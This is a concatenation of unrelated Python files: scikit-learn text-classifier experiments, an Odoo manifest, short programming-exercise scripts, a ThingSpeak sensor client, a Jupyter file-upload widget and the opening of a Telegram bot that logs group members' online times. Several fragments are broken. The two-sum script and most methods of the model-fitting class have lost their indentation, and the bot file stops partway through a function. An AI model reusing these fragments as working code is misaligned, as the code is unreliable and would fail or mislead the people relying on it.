# Old sklearn vectorizer/grid APIs emit DeprecationWarnings; silence them.
warnings.filterwarnings("ignore", category=DeprecationWarning)
# Manual grid over ngram size (i), vocabulary size (j), stop-word removal (k)
# and NB smoothing alpha (l); each metric is averaged over the 5 folds
# (hence the /5 on every accumulation).
for i in range(3):
    for j in range(5):
        for k in range(2):
            for l in range(10):
                accuracy = 0
                recall = 0
                precision = 0
                for train_index, test_index in kf.split(X):
                    # print("TRAIN:", train_index, "TEST:", test_index)
                    X_train_vector, X_test_vector = X[train_index], X[test_index]
                    y_train, y_test = y[train_index], y[test_index]
                    vectorizer = CountVectorizer(input='content',ngram_range=(1,i+1), max_features=5000 + j*5000,stop_words=(None if k==1 else 'english'))
                    X_train = vectorizer.fit_transform(X_train_vector)
                    # Re-use the training vocabulary so test vectors share columns.
                    vectorizer = CountVectorizer(input='content',ngram_range=(1,i+1), vocabulary=vectorizer.get_feature_names(), max_features=5000 + j*5000,stop_words=(None if k==1 else 'english'))
                    X_test = vectorizer.fit_transform(X_test_vector)
                    clf = MultinomialNB(alpha=0.01 + l*0.01)
                    clf.fit(X_train, y_train)
                    pred = clf.predict(X_test)
                    accuracy += sklearn.metrics.accuracy_score(pred,y_test)/5
                    recall += sklearn.metrics.recall_score(y_test,pred, average='weighted')/5
                    precision += sklearn.metrics.precision_score(y_test,pred,average='weighted')/5
                print(i,j,k,l,accuracy,recall,precision)
# Term Frequency vs TF-IDF tests for multiple classifiers including AdaBoost, Random Forests,
# Gaussian Naive Bayes
alphas = []
accs = []
accs2 = []
for l in range(1):
    accuracy = 0
    accuracy_2 = 0
    accuracy_svm = 0
    accuracy_svm_2 = 0
    accuracy_log = 0
    accuracy_log_2 = 0
    for train_index, test_index in kf.split(X):
        # print("TRAIN:", train_index, "TEST:", test_index)
        # NOTE(review): these fix the hyper-parameters inside the fold loop;
        # `l = 2` also clobbers the outer loop variable.
        i = 1
        j = 4
        k = 0
        l = 2
        X_train_vector, X_test_vector = X[train_index], X[test_index]
        y_train, y_test = y[train_index], y[test_index]
        # --- Term-frequency (CountVectorizer) features ---
        vectorizer = CountVectorizer(input='content',ngram_range=(1,i+1), max_features=5000 + j*5000,stop_words=(None if k==1 else 'english'))
        X_train = vectorizer.fit_transform(X_train_vector)
        vectorizer = CountVectorizer(input='content',ngram_range=(1,i+1), vocabulary=vectorizer.get_feature_names(), max_features=5000 + j*5000,stop_words=(None if k==1 else 'english'))
        X_test = vectorizer.fit_transform(X_test_vector)
        clf = AdaBoostClassifier(base_estimator=None, n_estimators=100, learning_rate=1.0, algorithm='SAMME.R', random_state=None)
        clf.fit(X_train, y_train)
        pred = clf.predict(X_test)
        accuracy += sklearn.metrics.accuracy_score(pred,y_test)/5
        clf = RandomForestClassifier(n_estimators=100, max_depth=2, random_state=0)
        clf.fit(X_train, y_train)
        pred = clf.predict(X_test)
        accuracy_svm += sklearn.metrics.accuracy_score(pred,y_test)/5
        clf = GaussianNB()
        clf.fit(X_train.toarray(), y_train)
        pred = clf.predict(X_test.toarray())
        accuracy_log += sklearn.metrics.accuracy_score(pred,y_test)/5
        print('tfidf')
        # --- TF-IDF features, same three classifiers ---
        vectorizer = TfidfVectorizer(input='content',ngram_range=(1,i+1), max_features=5000 + 5000*j,stop_words=(None if k==1 else 'english'))
        X_train = vectorizer.fit_transform(X_train_vector)
        vectorizer = TfidfVectorizer(input='content',ngram_range=(1,i+1), vocabulary=vectorizer.get_feature_names(), max_features=5000+5000*j, stop_words=(None if k==1 else 'english'))
        X_test = vectorizer.fit_transform(X_test_vector)
        clf = AdaBoostClassifier(base_estimator=None, n_estimators=100, learning_rate=1.0, algorithm='SAMME.R', random_state=None)
        clf.fit(X_train.toarray(), np.array(y_train).flatten())
        pred = clf.predict(X_test.toarray());
        accuracy_2 += sklearn.metrics.accuracy_score(pred,y_test)/5
        clf = RandomForestClassifier(n_estimators=100, max_depth=2, random_state=0)
        clf.fit(X_train, y_train)
        pred = clf.predict(X_test)
        accuracy_svm_2 += sklearn.metrics.accuracy_score(pred,y_test)/5
        clf = GaussianNB()
        clf.fit(X_train.toarray(), y_train)
        pred = clf.predict(X_test.toarray())
        accuracy_log_2 += sklearn.metrics.accuracy_score(pred,y_test)/5
        alphas.append(0.01 + l*0.01)
        accs.append(accuracy)
        accs2.append(accuracy_2)
    print(i,j,k,l,accuracy,accuracy_2)
# plt.plot(alphas,accs,'r-o', label='TF')
# plt.plot(alphas,accs2,'b-o', label='TF-IDF')
# plt.title('Accuracies for Alpha: TF vs. TF-IDF')
# plt.legend()
accuracy,accuracy_2,accuracy_svm,accuracy_svm_2,accuracy_log,accuracy_log_2
# plt.plot(n,pageRankScores26,'b-o',label='pageRankScores26')
plt.plot(alphas,accs2,'b-o', label='TF-IDF')
# Some other TF IDF Tests, SVMs
# Grid over ngram size (i), stop-words (j), vocabulary size (k), and C (l);
# the SVM uses cosine similarity as a custom kernel.
for i in range(4):
    for j in range(2):
        for k in range(5):
            for l in range(1):
                accuracy = 0
                recall = 0
                precision = 0
                for train_index, test_index in kf.split(X):
                    # print("TRAIN:", train_index, "TEST:", test_index)
                    X_train_vector, X_test_vector = X[train_index], X[test_index]
                    y_train, y_test = y[train_index], y[test_index]
                    vectorizer = TfidfVectorizer(input='content',ngram_range=(1,i+1), max_features=5000 + 5000*k,stop_words=(None if j==1 else 'english'))
                    X_train = vectorizer.fit_transform(X_train_vector)
                    # Share the training vocabulary with the test vectorizer.
                    vectorizer = TfidfVectorizer(input='content',ngram_range=(1,i+1), vocabulary=vectorizer.get_feature_names(), max_features=5000+5000*k,stop_words=(None if j==1 else 'english'))
                    X_test = vectorizer.fit_transform(X_test_vector)
                    clf = svm.SVC(C=1+l*10,kernel=cosine_similarity, gamma="auto")
                    clf.fit(X_train.toarray(), np.array(y_train).flatten())
                    pred = clf.predict(X_test.toarray());
                    accuracy += sklearn.metrics.accuracy_score(pred,y_test)/5
                    recall += sklearn.metrics.recall_score(y_test,pred, average='weighted')/5
                    precision += sklearn.metrics.precision_score(y_test,pred,average='weighted')/5
                # print(i,j,k,l,accuracy,recall,precision)
|
# -*- coding: utf-8 -*-
# Odoo module manifest for the construction-management addon.
{
    'name': "construction",
    'summary': """
        Construction Management""",
    'description': """
        Construction Management Build By Raqmi
    """,
    'author': "Raqmi",
    'website': "http://www.raqmisoultions.com",
    'category': 'Construction',
    'version': '0.1',
    # Fix: 'stock' was listed twice in `depends`; the duplicate is removed.
    'depends': ['dash_view', 'map_view', 'sale',
                'project',
                'hr_timesheet',
                'hr_contract_type',
                'sale_timesheet',
                'purchase',
                'note',
                'stock',
                'stock_account',
                'material_purchase_requisitions',
                'account',
                'analytic',
                'account_asset',
                'crm'],
    # XML/CSV data files loaded in order at install/upgrade time.
    'data': [
        'security/construction_security.xml',
        'security/ir.model.access.csv',
        'data/data.xml',
        'data/task_sequence.xml',
        'views/assets.xml',
        'wizard/project_user_subtask_view.xml',
        'wizard/task_costing_invoice_wiz.xml',
        'views/task_cost_view.xml',
        'views/project.xml',
        'views/construction_management_view.xml',
        'views/note_view.xml',
        'views/project_task_view.xml',
        'views/project_view_construct.xml',
        'views/purchase_view.xml',
        'report/report_note_view.xml',
        'views/accounting_view.xml',
        'views/estimated_sheet.xml',
        'views/project_boq.xml',
        'views/crm_view.xml',
        'wizard/whatsapp_wizard.xml',
        'views/menu.xml'
    ],
}
|
# Print the powers of two strictly below the user-supplied bound.
# Fix: parse the input once instead of calling int(n) on every loop
# iteration (and fail fast on non-numeric input).
n = int(input("Введите число\n"))
number = 1
while n > number:
    print(number)
    number = number * 2
from sys import stdin
input = stdin.readline  # faster line reads for competitive-programming input

# Plan (translated from the original Korean notes):
# 1. choose a suitable dp table, 2. set its base values,
# 3. fill it following the recurrence.
#
# Consulting-schedule problem: job i takes days_costs[i][0] days and pays
# days_costs[i][1]; maximise total pay within n days.
n = int(input().rstrip())
days_costs = [tuple(map(int, input().rstrip().split())) for _ in range(n)]

# dp[i] = best profit obtainable from day i onward; one extra slot so
# dp[n] is a safe base case for jobs starting on the last day.
dp = [0] * (n + 1)
for day_ix in range(n - 1, -1, -1):  # fill backwards
    duration, pay = days_costs[day_ix]
    if day_ix + duration > n:
        # Job would run past the deadline: it cannot be taken.
        dp[day_ix] = dp[day_ix + 1]
        continue
    # Either skip this job, or take it and jump past its duration.
    dp[day_ix] = max(dp[day_ix + 1], dp[day_ix + duration] + pay)
print(dp[0])
|
nums = [3,2,4]
target = 6
ret =[]
l = nums.__len__()
for i in range(0, l):
for j in range(i+1, l):
if (nums[i]+nums[j]) == target:
ret.append(i)
ret.append(j)
break
print ret
|
from sklearn.ensemble import AdaBoostClassifier
from sklearn.tree import DecisionTreeClassifier
from sklearn.ensemble import RandomForestClassifier
from sklearn.linear_model import LogisticRegression
from sklearn.metrics import roc_curve, auc, precision_score, recall_score, f1_score
from sklearn import grid_search, svm, preprocessing
from classification_table import classification_table
import pylab as pl
class FitModels(object):
    def __init__(self, x_train, x_test, y_train, y_test, data_name):
        # Train/test design matrices and label vectors, plus a tag used to
        # name the output plot/table files.
        self.x_train = x_train
        self.x_test = x_test
        self.y_train = y_train
        self.y_test = y_test
        self.data_name = data_name
def run_svm(self):
svm_params = {'C': [2**-4, 2**-3, 2**-2, 2**-1, 2**0,
2**1, 2**2, 2**3, 2**4],
'gamma': [0, 2**-4, 2**-3, 2**-2, 2**-1, 2**0,
2**1, 2**2, 2**3, 2**4],
'kernel': ['linear', 'rbf'],
'class_weight': ['auto', None]}
clf = svm.SVC(probability=True)
model = grid_search.GridSearchCV(clf, svm_params, n_jobs=3, cv=5)
print 'Fitting model...'
model.fit(self.x_train, self.y_train)
print 'SVM best estimator: {}'.format(model.best_estimator_)
print 'SVM gridsearchCV scores: {}'.format(model.grid_scores_)
print 'SVM .score: {}'.format(model.score(self.x_train,self.y_train))
svm_predicted = model.predict(self.x_test)
svm_predicted_prob = model.predict_proba(self.x_test)
print 'SMV precision: {}\n'.format(precision_score(self.y_test,
svm_predicted))
print 'SMV recall: {}\n'.format(recall_score(self.y_test,
svm_predicted))
print 'SMV f1_score: {}\n'.format(f1_score(self.y_test,
svm_predicted))
self.make_roc_plot(self.y_test, svm_predicted_prob, self.data_name,
'SVM')
class_table_svm = classification_table(self.y_test, svm_predicted)
filename = 'smv_class_table_{}'.format(self.data_name)
with open(filename, 'w') as f:
f.write(class_table_svm)
def run_rf(self):
rf = RandomForestClassifier(max_depth=None, min_samples_split=1,
random_state=0)
rf_parameters = {'n_estimators':[100,250,500,750,1000]}
rf_grid = grid_search.GridSearchCV(rf, rf_parameters)
print 'Fitting model...'
rf_grid.fit(self.x_train,self.y_train)
print '\nRandom Forest best estimator: {}\n'.format(rf_grid.best_estimator_)
print 'Random Forest gridsearchCV scores: {}\n'.format(rf_grid.grid_scores_)
rf_predicted_prob = rf_grid.predict_proba(self.x_test)
rf_predicted = rf_grid.predict(self.x_test)
print 'Random forest precision: {}\n'.format(precision_score(self.y_test,
rf_predicted))
print 'Random forest recall: {}\n'.format(recall_score(self.y_test,
rf_predicted))
print 'Random forest f1_score: {}\n'.format(f1_score(self.y_test,
rf_predicted))
self.make_roc_plot(self.y_test, rf_predicted_prob, self.data_name,
'Random Forest')
class_table_rf = classification_table(self.y_test, rf_predicted)
filename = 'rf_class_table_{}'.format(self.data_name)
with open(filename, 'w') as f:
f.write(class_table_rf)
def run_logit(self):
lr = LogisticRegression()
lr_parameters = {'penalty':['l1', 'l2'],
'C': [2**-4, 2**-3, 2**-2, 2**-1, 2**0,
2**1, 2**2, 2**3, 2**4],
'class_weight':['auto', None]}
lr_grid = grid_search.GridSearchCV(lr, lr_parameters)
print 'Fitting model...'
lr_grid.fit(self.x_train,self.y_train)
print '\nLogistic Regression best estimator: {}\n'.format(lr_grid.best_estimator_)
print 'Logistic Regression gridsearchCV scores: {}\n'.format(lr_grid.grid_scores_)
lr_predicted_prob = lr_grid.predict_proba(self.x_test)
lr_predicted = lr_grid.predict(self.x_test)
print 'Random forest precision: {}\n'.format(precision_score(self.y_test,
lr_predicted))
print 'Random forest recall: {}\n'.format(recall_score(self.y_test,
lr_predicted))
print 'Random forest f1_score: {}\n'.format(f1_score(self.y_test,
lr_predicted))
self.make_roc_plot(self.y_test, lr_predicted_prob, self.data_name,
'Logistic Regression')
class_table_lr = classification_table(self.y_test, lr_predicted)
filename = 'lr_class_table_{}'.format(self.data_name)
with open(filename, 'w') as f:
f.write(class_table_lr)
def run_gbt(self):
bdt = AdaBoostClassifier(DecisionTreeClassifier())
bdt_parameters = {'algorithm':('SAMME', 'SAMME.R'),
'n_estimators':[100,250,500,750,1000]}
bdt_grid = grid_search.GridSearchCV(bdt, bdt_parameters)
print 'Fitting model...'
bdt_grid.fit(self.x_train,self.y_train)
print 'AdaBoost best estimator: {}\n'.format(bdt_grid.best_estimator_)
print 'AdaBoost gridsearchCV scores: {}\n'.format(bdt_grid.grid_scores_)
bdt_predicted_prob = bdt_grid.predict_proba(self.x_test)
bdt_predicted = bdt_grid.predict(self.x_test)
print 'AdaBoost precision: {}\n'.format(precision_score(self.y_test,
bdt_predicted))
print 'AdaBoost recall: {}\n'.format(recall_score(self.y_test,
bdt_predicted))
print 'AdaBoost f1_score: {}\n'.format(f1_score(self.y_test,
bdt_predicted))
self.make_roc_plot(self.y_test, bdt_predicted_prob, self.data_name,
'AdaBoost')
class_table_boost = classification_table(self.y_test, bdt_predicted)
with open('adaboost_class_table.txt', 'w') as f:
f.write(class_table_boost)
def run_all(self):
print '='*15 + '\n'
print 'Running for data: {}\n'.format(self.data_name)
print '='*15 + '\n\n'
print 'Running RF\n\n'
self.run_rf()
print 'Running GBT\n\n'
self.run_gbt()
print 'Running Logit\n\n'
self.run_logit()
print 'Running SVM\n\n'
self.run_svm()
print '='*15 + '\n'
def make_roc_plot(self, test_data, predicted_probs, data_name, model_name):
"""
Function to generate ROC plots.
Inputs
------
test_data : y_test data from the train-test splits.
eoi : The event of interest under examination.
Output
------
Saves the ROC plot to a file with the EOI in the name.
"""
fpr, tpr, thresholds = roc_curve(test_data, predicted_probs[:, 1])
roc_auc = auc(fpr, tpr)
print 'AUC is {}'.format(roc_auc)
figname = 'roc_plot_{}_{}'.format(data_name, model_name)
title = 'ROC Curve - {} - {}'.format(data_name, model_name)
pl.clf()
pl.plot(fpr, tpr, label='ROC curve (area = %0.2f)' % roc_auc)
pl.plot([0, 1], [0, 1], 'k--')
pl.xlim([0.0, 1.0])
pl.ylim([0.0, 1.0])
pl.xlabel('False Positive Rate')
pl.ylabel('True Positive Rate')
pl.title(title)
pl.legend(loc="lower right")
pl.savefig(figname, bbox_inches=0)
if __name__ == '__main__':
import numpy as np
x_train = np.genfromtxt('./x_train.csv', delimiter=',')
x_test = np.genfromtxt('./x_test.csv', delimiter=',')
x_train = preprocessing.scale(x_train)
x_test = preprocessing.scale(x_test)
y_train = np.genfromtxt('./y_train.csv', delimiter=',')
y_test = np.genfromtxt('./y_test.csv', delimiter=',')
proc = FitModels(x_train, x_test, y_train, y_test, 'Prediction')
proc.run_svm()
#proc.run_all()
clf = svm.SVC(C=2, cache_size=200, class_weight='auto', coef0=0.0, degree=3,
gamma=0, kernel='rbf', max_iter=-1, probability=True,
random_state=None, shrinking=True, tol=0.001, verbose=False)
clf.fit(x_train, y_train)
svm_predicted = clf.predict(x_test)
svm_predicted_prob = clf.predict_proba(x_test)
print 'SMV precision: {}\n'.format(precision_score(y_test,
svm_predicted))
print 'SMV recall: {}\n'.format(recall_score(y_test, svm_predicted))
print 'SMV f1_score: {}\n'.format(f1_score(y_test, svm_predicted))
make_roc_plot(y_test, svm_predicted_prob, 'Prediction', 'SVM')
class_table_svm = classification_table(y_test, svm_predicted)
filename = 'smv_class_table_{}'.format('Prediction')
with open(filename, 'w') as f:
f.write(class_table_svm)
def make_roc_plot(test_data, predicted_probs, data_name, model_name):
    """
    Function to generate ROC plots.
    NOTE(review): duplicates FitModels.make_roc_plot and is defined *after*
    the __main__ block that tries to call it, so at script run time that
    call site does not see this name yet.
    Inputs
    ------
    test_data : y_test data from the train-test splits.
    predicted_probs : class probabilities; column 1 is taken as the
        positive class.
    data_name : data-set label used in the plot title and file name.
    model_name : model label used in the plot title and file name.
    Output
    ------
    Saves the ROC plot to 'roc_plot_<data_name>_<model_name>'.
    """
    # roc_curve expects scores for the positive class (column 1).
    fpr, tpr, thresholds = roc_curve(test_data, predicted_probs[:, 1])
    roc_auc = auc(fpr, tpr)
    print 'AUC is {}'.format(roc_auc)
    figname = 'roc_plot_{}_{}'.format(data_name, model_name)
    title = 'ROC Curve - {} - {}'.format(data_name, model_name)
    # Clear any previous figure before drawing.
    pl.clf()
    pl.plot(fpr, tpr, label='ROC curve (area = %0.2f)' % roc_auc)
    # Diagonal = chance-level classifier.
    pl.plot([0, 1], [0, 1], 'k--')
    pl.xlim([0.0, 1.0])
    pl.ylim([0.0, 1.0])
    pl.xlabel('False Positive Rate')
    pl.ylabel('True Positive Rate')
    pl.title(title)
    pl.legend(loc="lower right")
    pl.savefig(figname, bbox_inches=0)
|
# Copyright (c) Facebook, Inc. and its affiliates. All Rights Reserved.
#from .coco import COCODataset
#from .voc import PascalVOCDataset
from .concat_dataset import ConcatDataset
from .giro import giro
__all__ = ["giro","ConcatDataset"] # "COCODataset", "ConcatDataset", "PascalVOCDataset",
|
import requests
from time import time, sleep
class ThingSpeakService:
    """Read CO2 / temperature / humidity values from a ThingSpeak channel.

    HTTP requests are rate-limited: at most one real request every
    `read_delay` seconds; in between, the last successful payload is
    served from `last_reading`.
    """

    def __init__(self, channel, api_key):
        self.url = 'https://api.thingspeak.com/channels/'
        self.channel = channel
        self.api_key = api_key
        # ThingSpeak stores each metric in a numbered field.
        self.co2_field = 'field1'
        self.temp_field = 'field2'
        self.hum_field = 'field3'
        self.read_delay = 10           # seconds between real HTTP requests
        self.last_read_time = 0
        self.last_reading = ""         # "" until the first successful fetch

    def get_readings_json(self, nr_readings):
        """Return the channel's feeds JSON (dict), or the cached/"" value
        when throttled or on any request failure."""
        current_time = time()
        if current_time - self.last_read_time > self.read_delay:
            try:
                # Mark the attempt first so failures are throttled too.
                self.last_read_time = current_time
                req = self.url + str(self.channel) + '/feeds.json?api_key=' + self.api_key + '&results=' + str(nr_readings)
                response = requests.get(req)
                if response.status_code == 200:
                    self.last_reading = response.json()
                    return response.json()
                else:
                    return self.last_reading
            except Exception:
                # Bug fix: was a bare `except:`, which also swallowed
                # SystemExit/KeyboardInterrupt.
                return self.last_reading
        else:
            return self.last_reading

    def get_field(self, field_name, num_readings):
        """Return one field value (num_readings == 1) or a list of values.

        Robustness fix: before the first successful request last_reading
        is "" and the old code crashed with AttributeError on "".get();
        return None (or a list of Nones) instead so get_co2/temp/hum fall
        back to 0.
        """
        json = self.get_readings_json(num_readings)
        feeds = json.get('feeds') if isinstance(json, dict) else None
        if not feeds:
            return None if num_readings == 1 else [None] * num_readings
        if num_readings == 1:
            return feeds[0].get(field_name)
        return [feeds[i].get(field_name) for i in range(num_readings)]

    def get_co2(self, nr=1):
        """Latest CO2 reading as int; 0 when unavailable."""
        value = self.get_field(self.co2_field, nr)
        return 0 if value is None else int(value)

    def get_temp(self, nr=1):
        """Latest temperature reading as float; 0 when unavailable."""
        value = self.get_field(self.temp_field, nr)
        return 0 if value is None else float(value)

    def get_hum(self, nr=1):
        """Latest humidity reading as float; 0 when unavailable."""
        value = self.get_field(self.hum_field, nr)
        return 0 if value is None else float(value)
# Copyright(c) Jupyter Development Team.
# Distributed under the terms of the Modified BSD License.
"""FileUpload class.
Represents a file upload button.
"""
from traitlets import (
observe, default, Unicode, Dict, List, Int, Bool, Bytes, CaselessStrEnum
)
from .widget_description import DescriptionWidget
from .valuewidget import ValueWidget
from .widget_core import CoreWidget
from .widget_button import ButtonStyle
from .widget import register, widget_serialization
from .trait_types import InstanceDict
@register
class FileUpload(DescriptionWidget, ValueWidget, CoreWidget):
    """
    Upload file(s) from browser to Python kernel as bytes
    """
    # Names binding this widget to its JavaScript model/view counterparts.
    _model_name = Unicode('FileUploadModel').tag(sync=True)
    _view_name = Unicode('FileUploadView').tag(sync=True)
    # Accepted file types (forwarded to the HTML input's `accept` attribute).
    accept = Unicode(help='File types to accept, empty string for all').tag(sync=True)
    multiple = Bool(help='If True, allow for multiple files upload').tag(sync=True)
    disabled = Bool(help='Enable or disable button').tag(sync=True)
    icon = Unicode('upload', help="Font-awesome icon name, without the 'fa-' prefix.").tag(sync=True)
    button_style = CaselessStrEnum(
        values=['primary', 'success', 'info', 'warning', 'danger', ''], default_value='',
        help="""Use a predefined styling for the button.""").tag(sync=True)
    style = InstanceDict(ButtonStyle).tag(sync=True, **widget_serialization)
    # Last upload error reported by the front end ('' when none).
    error = Unicode(help='Error message').tag(sync=True)
    # One dict per uploaded file, synced from the browser
    # (presumably name/content/metadata keys — confirm against the JS side).
    value = List(Dict(), help="The file upload value").tag(sync=True)
    @default('description')
    def _default_description(self):
        # Default label shown on the upload button.
        return 'Upload'
|
def main(n, m):
    """Print 'Yes' when the two values are equal, otherwise 'No'."""
    answer = 'Yes' if n == m else 'No'
    print(answer)
if __name__ == '__main__':
    # Read one line of input: two whitespace-separated integers.
    tokens = input().split()
    n = int(tokens[0])
    m = int(tokens[1])
    main(n, m)
|
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
'''
Trusted Sleep Monitor Bot
This bot monitors group members' sleep time using online status.
Threads:
* tg-cli
* Event: set online state
* Telegram API polling
* /status - List sleeping status
* /average - List statistics about sleep time
* /help - About the bot
* /start - Describe how to use
* /settz - Set user timezone
* /subscribe - Add user to watchlist
* /unsubscribe - Remove user from watchlist
* Main
* SQLite
* Member
* Basic info
* Subscribed?
* Timezone
* Sleep start/end events
'''
import os
import re
import sys
import math
import time
import json
import queue
import signal
import sqlite3
import logging
import gettext
import datetime
import requests
import operator
import functools
import itertools
import threading
import collections
import concurrent.futures
import pytz
import tgcli
import humanizetime
# ISO 6709 coordinate pair as found in the tz database's zone.tab:
# signed latitude followed by signed longitude, in DDMM(SS)/DDDMM(SS) form.
re_zoneloc = re.compile(r'([+-]\d{4,7})([+-]\d{4,7})')
# '-v' as the last CLI argument enables debug logging.
logging.basicConfig(stream=sys.stderr, format='%(asctime)s [%(name)s:%(levelname)s] %(message)s', level=logging.DEBUG if sys.argv[-1] == '-v' else logging.INFO)
logger_botapi = logging.getLogger('botapi')
# Shared pool for fire-and-forget tasks (see async_func).
executor = concurrent.futures.ThreadPoolExecutor(5)
# One keep-alive HTTP session reused for all Bot API calls.
HSession = requests.Session()
class AttrDict(dict):
    """A dict whose items can also be read and written as attributes."""

    def __init__(self, *args, **kwargs):
        dict.__init__(self, *args, **kwargs)
        # Alias the attribute namespace to the mapping itself, so
        # `d.key` and `d['key']` share the same storage.
        self.__dict__ = self
# Cli bot
def tg_mktime(s):
    """Parse tg-cli's local-time string '%Y-%m-%d %H:%M:%S' to a Unix timestamp."""
    parsed = time.strptime(s, '%Y-%m-%d %H:%M:%S')
    return time.mktime(parsed)
def handle_tg_update(obj):
    """Record user activity from one tg-cli event.

    `obj` is a parsed tg-cli JSON event.  'message'/'service' events carry
    the sender in 'from' and a 'date'; 'online-status' events carry 'user'
    and a local-time 'when' string.  All failures are logged, never raised.
    """
    try:
        if obj.get('event') in ('message', 'service'):
            #update_user(obj['from'])
            user_event(obj['from'], obj['date'])
            # 'when' is the sender's last-seen time attached to the update.
            if 'when' in obj['from']:
                user_event(obj['from'], tg_mktime(obj['from']['when']))
        elif obj.get('event') == 'online-status':
            #update_user(obj['user'])
            try:
                # it's localtime
                user_event(obj['user'], tg_mktime(obj['when']))
            except ValueError:
                # Unparseable timestamp — skip this event.
                pass
    except Exception:
        logging.exception("can't handle message event")
def tg_get_members(chat):
    """Fetch all members of a group/supergroup via tg-cli.

    Returns a list of user dicts, or None for non-group chats.
    """
    chattype = chat.get('type')
    # To ensure the id is valid
    TGCLI.cmd_dialog_list()
    if chattype == 'group':
        # tg-cli addresses basic groups as chat#id<positive id>;
        # Bot API group ids are negative, hence the sign flip.
        peername = 'chat#id%d' % (-chat['id'])
        obj = TGCLI.cmd_chat_info(peername)
        return obj['members']
    elif chattype == 'supergroup':
        # Bot API supergroup ids are -100xxxxxxxxxx; strip that prefix.
        peername = 'channel#id%d' % (-chat['id'] - 1000000000000)
        # Page through the member list 100 at a time until an empty page.
        members = items = TGCLI.cmd_channel_get_members(peername, 100)
        dcount = 100
        while items:
            items = TGCLI.cmd_channel_get_members(peername, 100, dcount)
            members.extend(items)
            dcount += 100
        return members
    else:
        return
# API bot
class BotAPIFailed(Exception):
    """Raised when the Telegram Bot API answers with ok=False."""
    pass
def async_func(func):
    """Decorator: run `func` on the shared thread pool.

    The wrapped call returns immediately (result discarded); any exception
    raised by `func` is logged instead of propagating.
    """
    @functools.wraps(func)
    def wrapped(*args, **kwargs):
        def func_noerr(*args, **kwargs):
            try:
                func(*args, **kwargs)
            except Exception:
                logger_botapi.exception('Async function failed.')
        executor.submit(func_noerr, *args, **kwargs)
    return wrapped
def bot_api(method, **params):
    """Call a Telegram Bot API method and return its 'result' payload.

    Retries up to 3 attempts with a growing back-off; raises the last
    network error if all attempts fail, or BotAPIFailed when the API
    answers with ok=False.
    """
    for att in range(3):
        try:
            req = HSession.get(('https://api.telegram.org/bot%s/' %
                                CFG.apitoken) + method, params=params, timeout=45)
            retjson = req.content
            ret = json.loads(retjson.decode('utf-8'))
            break
        except Exception as ex:
            # Bug fix: the condition was `att < 1`, which re-raised on the
            # second failure, so the third attempt implied by range(3)
            # never happened.
            if att < 2:
                time.sleep((att + 1) * 2)
            else:
                raise ex
    if not ret['ok']:
        raise BotAPIFailed(repr(ret))
    return ret['result']
@async_func
def sendmsg(text, chat_id, reply_to_message_id=None):
    """Send `text` to `chat_id` asynchronously (return value is discarded
    by the async_func wrapper).  Long messages are truncated to fit the
    Bot API limit; empty messages are dropped with a warning."""
    text = text.strip()
    if not text:
        logger_botapi.warning('Empty message ignored: %s, %s' % (chat_id, reply_to_message_id))
        return
    logger_botapi.info('sendMessage(%s): %s' % (len(text), text[:20]))
    if len(text) > 2000:
        # Truncate and mark with an ellipsis.
        text = text[:1999] + '…'
    reply_id = reply_to_message_id
    # Negative reply ids are used internally as "no reply" markers.
    if reply_to_message_id and reply_to_message_id < 0:
        reply_id = None
    return bot_api('sendMessage', chat_id=chat_id, text=text, reply_to_message_id=reply_id)
def updatebotinfo():
    """Fetch the bot's own username/nickname via getMe and cache in CFG."""
    global CFG
    d = bot_api('getMe')
    CFG['username'] = d.get('username')
    CFG['nickname'] = d.get('first_name')
def getupdates():
    """Long-poll getUpdates forever, queueing each update into MSG_Q.

    CFG['offset'] is advanced past the newest update so updates are
    acknowledged and not re-delivered.  Runs on its own thread.
    """
    global CFG
    while 1:
        try:
            updates = bot_api('getUpdates', offset=CFG['offset'], timeout=10)
        except Exception:
            logger_botapi.exception('Get updates failed.')
            continue
        if updates:
            logger_botapi.debug('Messages coming.')
            CFG['offset'] = updates[-1]["update_id"] + 1
            for upd in updates:
                MSG_Q.put(upd)
        time.sleep(.2)
def parse_cmd(text: str):
    """Split a message into (command, argument).

    Returns (None, None) when the text is not a command for this bot;
    otherwise the command name without the leading '/' and the stripped
    argument string (possibly empty).
    """
    pieces = text.strip().replace('\xa0', ' ').split(' ', 1)
    if not pieces:
        return (None, None)
    head = pieces[0].rsplit('@', 1)
    command = head[0]
    if len(command) < 2 or not command.startswith('/'):
        return (None, None)
    # A '/cmd@OtherBot' form addressed to a different bot is ignored.
    if len(head) > 1 and 'username' in CFG and head[-1] != CFG['username']:
        return (None, None)
    argument = pieces[1].strip() if len(pieces) > 1 else ''
    return (command[1:], argument)
def handle_api_update(d):
    """Dispatch one Bot API update: record activity, then run a command.

    Non-command group messages still update the user↔chat mapping; in
    private chats an unknown command gets an error reply.
    """
    logger_botapi.debug('Msg arrived: %r' % d)
    if 'message' in d:
        try:
            msg = d['message']
            # Every message counts as user activity.
            update_user(msg['from'])
            user_event(msg['from'], msg['date'])
            cmd, expr = parse_cmd(msg.get('text', ''))
            if cmd in COMMANDS:
                logger_botapi.info('Command: /%s %s' % (cmd, expr))
                COMMANDS[cmd](expr, msg['chat']['id'], msg['message_id'], msg)
            elif msg['chat']['type'] == 'private':
                sendmsg(_('Invalid command. Send /help for help.'), msg['chat']['id'], msg['message_id'])
            else:
                # Plain group chatter: remember that this user is in this chat.
                update_user_group(msg['from'], msg['chat'])
        except Exception:
            logger_botapi.exception('Failed to process a message.')
# Processing
class _TimezoneLocationDict(pytz.LazyDict):
    """Map timezone name to its principal (lat, lon) parsed from zone.tab.

    Filled lazily on first access, like pytz's own lazy mappings.
    """
    # Bug fix: the original __getitem__ referenced a bare `_fill_lock`,
    # which is a module-global of pytz.lazy and is NOT in scope here, so
    # the first lookup raised NameError.  Use our own class-level lock.
    _lock = threading.RLock()

    def __getitem__(self, key):
        if self.data is None:
            with self._lock:
                # Double-checked: another thread may have filled it already.
                if self.data is None:
                    self._fill()
        return self.data[key]

    def _convert_coordinates(self, match):
        """Convert an ISO 6709 DDMM(SS)/DDDMM(SS) pair to decimal degrees."""
        lat_text, lon_text = match.groups()
        if len(lat_text) < 7:
            lat = int(lat_text[:-2]) + int(lat_text[-2:]) / 60
        else:
            lat = int(lat_text[:-4]) + int(lat_text[-4:-2]) / 60 + int(lat_text[-2:]) / 3600
        if len(lon_text) < 7:
            lon = int(lon_text[:-2]) + int(lon_text[-2:]) / 60
        else:
            lon = int(lon_text[:-4]) + int(lon_text[-4:-2]) / 60 + int(lon_text[-2:]) / 3600
        return (lat, lon)

    def _fill(self):
        """Parse pytz's bundled zone.tab into {zone: (lat, lon)}."""
        data = {}
